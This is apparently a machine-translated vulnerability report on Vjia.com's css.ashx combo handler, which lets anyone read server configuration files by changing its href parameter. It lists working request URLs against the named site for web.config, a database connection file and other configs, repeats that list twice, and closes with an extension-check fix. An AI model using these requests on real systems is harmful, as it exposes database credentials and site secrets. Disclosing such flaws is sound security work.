Fanke's Vjia.com js/css combo can read database configuration files
When accessing the fanke mall system, we found that a simple way to view the database and site information configuration files may be caused by the lack of logic judgment in the program.
View the source code on the Vjia.com list page
Copy the URL for js/css combo to the address bar and change the href parameter to web. config.
Example: http://rscdn.vjia.com/css.ashx? Href = web. config
And the configuration under the appSettings node in web. config can be read.
Example: database connection string
Http://rscdn.vjia.com/css.ashx? Href =/ConfigFiles/Connection. config
And more
Http://rscdn.vjia.com/css.ashx? Href =/ConfigFiles/Parameters. xml
Http://rscdn.vjia.com/css.ashx? Href =/ConfigFiles/WebSite. xml
Http://rscdn.vjia.com/css.ashx? Href =/ConfigFiles/RSConfig. xml
Http://rscdn.vjia.com/css.ashx? Href =/ConfigFiles/SearchConfig. xml
Http://rscdn.vjia.com/css.ashx? Href =/ConfigFiles/SolrCoreConfig. xml
Http://rscdn.vjia.com/css.ashx? Href =/ConfigFiles/CacheConfig. config
Http://rscdn.vjia.com/css.ashx? Href =/ConfigFiles/SortConfig. xml
May be deprecated
View the source code on the Vjia.com list page
Copy the URL for js/css combo to the address bar and change the href parameter to web. config.
Example: http://rscdn.vjia.com/css.ashx? Href = web. config
And the configuration under the appSettings node in web. config can be read.
Example: database connection string
Http://rscdn.vjia.com/css.ashx? Href =/ConfigFiles/Connection. config
And more
Http://rscdn.vjia.com/css.ashx? Href =/ConfigFiles/Parameters. xml
Http://rscdn.vjia.com/css.ashx? Href =/ConfigFiles/WebSite. xml
Http://rscdn.vjia.com/css.ashx? Href =/ConfigFiles/RSConfig. xml
Http://rscdn.vjia.com/css.ashx? Href =/ConfigFiles/SearchConfig. xml
Http://rscdn.vjia.com/css.ashx? Href =/ConfigFiles/SolrCoreConfig. xml
Http://rscdn.vjia.com/css.ashx? Href =/ConfigFiles/CacheConfig. config
Http://rscdn.vjia.com/css.ashx? Href =/ConfigFiles/SortConfig. xml
Solution:
Add extension verification to the css. ashx and js. ashx General handlers. Non-js or css files do not execute merged output.